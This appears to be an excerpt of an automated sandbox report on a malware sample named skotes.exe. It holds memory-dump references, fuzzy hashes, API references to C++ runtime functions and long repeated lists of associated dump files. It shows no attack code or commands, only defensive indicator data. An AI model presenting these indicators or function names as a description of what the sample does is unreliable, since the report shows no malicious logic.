                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID:
• String ID: 6l$C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
• API String ID: 0-2569784805
• Opcode ID: 744b22ae0be1ff8cb5e0f455c947f3ad033ea986fb53a2c36a56052bc336f15c
• Instruction ID: cb8b1b2667eb00064011e80bb629aa5d5e027214b14d6366106c6f8a53e66124
• Opcode Fuzzy Hash: 744b22ae0be1ff8cb5e0f455c947f3ad033ea986fb53a2c36a56052bc336f15c
• Instruction Fuzzy Hash: 5E219F717042096F9B70AE658C85FBB77BFEF00364710461CF92896292EB72EC2186A4
APIs
• List.LIBCONCRT ref: 006BAEEA
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 006BAF0F
• Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 006BAF4E
Strings
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
• String ID: pExecutionResource
• API String ID: 1772865662-359481074
• Opcode ID: e949cd9c9bd0bdd37cef7e598f6c496d762d2a944b61f0e4a44b0b6e2b34def3
• Instruction ID: 5d1a926c10ea921c82c33f1bc51f31851c27150e873bb589d27adc05367183c1
• Opcode Fuzzy Hash: e949cd9c9bd0bdd37cef7e598f6c496d762d2a944b61f0e4a44b0b6e2b34def3
• Instruction Fuzzy Hash: CF2193B5A402059BCB48EF94C882BFEB7A7BF49310F11401DE501AB782DBB0EE45CB95
APIs
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 006B4F24
• Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 006B4F66
Strings
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: CacheGroupLocalSchedule$Concurrency::details::SegmentSegment::std::invalid_argument::invalid_argument
• String ID: count$ppVirtualProcessorRoots
• API String ID: 2663199487-3650809737
• Opcode ID: e030d175b8756f21ca384768579908702a58e782584d6c076fad25d22cd31bcc
• Instruction ID: 961f9f10ecd6b7be9ae07b168e3e4d6189a714befa8ab06caffe15cb19bb9e27
• Opcode Fuzzy Hash: e030d175b8756f21ca384768579908702a58e782584d6c076fad25d22cd31bcc
• Instruction Fuzzy Hash: 8D21BA74600215EFCB44EFA8C892EAE77A6BF49310F00406DF5069B692DF71EE42CB55
APIs
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 006BBA0E
Strings
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
• String ID: RoInitialize$RoUninitialize$combase.dll
• API String ID: 348560076-3997890769
• Opcode ID: 26669a1af991a1aad2cb726dc8743e80ae07cb158b653e827ec82505a85e3a1c
• Instruction ID: 59b1b9aabf715c15df60414f1cbe502cc8cbe24de86a9574d12c81fee0b8e49a
• Opcode Fuzzy Hash: 26669a1af991a1aad2cb726dc8743e80ae07cb158b653e827ec82505a85e3a1c
• Instruction Fuzzy Hash: CC01D6B0A823656AD71077B65C0DBFB399E9F06704F603429B640F6282EF75C8418BA5
APIs
• SafeRWList.LIBCONCRT ref: 006B6E73
  • Part of subcall function 006B4E6E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 006B4E7F
  • Part of subcall function 006B4E6E: List.LIBCMT ref: 006B4E89
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 006B6E85
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 006B6EAA
Strings
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: List$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
• String ID: eventObject
• API String ID: 1288476792-1680012138
APIs
• Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 006BA102
• Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 006BA126
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 006BA139
Strings
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
• String ID: pScheduler
• API String ID: 246774199-923244539
APIs
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: __alloca_probe_16__freea
• String ID:
• API String ID: 1635606685-0
• Opcode ID: 5b708b2c9a3e8d20e4f28ed9c7507869134727fe11a3e7b3aa7e3cfd72724393
• Instruction ID: 46987daaefd113aac18a6df11b2e4b35a9cc8a4db3b15deccaf55b8d58ce7dbb
• Opcode Fuzzy Hash: 5b708b2c9a3e8d20e4f28ed9c7507869134727fe11a3e7b3aa7e3cfd72724393
• Instruction Fuzzy Hash: C281BE72E0024A9BDF209EA5C891EEE7BA7DF09314F19415AF841BB341E7358C459BA0
APIs
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: AdjustPointer
• String ID:
• API String ID: 1740715915-0
• Opcode ID: 652165df6266fd4b89dbff1ec4c4fa38ac853b3aaf9aa8dd3fb122bea264bf39
• Instruction ID: 38649942f567d5ebb11e5d642a0cac390f90e644ba756359aae3293dd4c69980
• Opcode Fuzzy Hash: 652165df6266fd4b89dbff1ec4c4fa38ac853b3aaf9aa8dd3fb122bea264bf39
• Instruction Fuzzy Hash: 6451B071601A06AFDB259F54DC85FBA77A7EF11300F19452DE8038BA91EB31BD81CB91
APIs
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmp
